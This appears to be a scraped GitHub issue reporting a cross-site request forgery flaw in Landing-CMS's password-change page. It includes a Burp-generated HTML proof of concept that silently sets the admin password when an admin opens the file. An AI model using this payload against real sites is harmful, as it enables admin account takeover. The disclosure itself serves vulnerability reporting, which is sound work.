Landing-CMS icon indicating copy to clipboard operation
Landing-CMS copied to clipboard

Published 20 hours ago verified publisher icon Elias-Black

Landing-CMS has Cross-site request forgery.

Open SunJ3t opened this issue 4 years ago • 0 comments

http://192.168.18.130/cms/password/

I can change the admin's password when admin click the csrf html file.

payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.18.130/cms/password/" method="POST">
      <input type="hidden" name="pwd1" value="12345" />
      <input type="hidden" name="pwd2" value="12345" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

图片

SunJ3t avatar Sep 10 '19 07:09 SunJ3t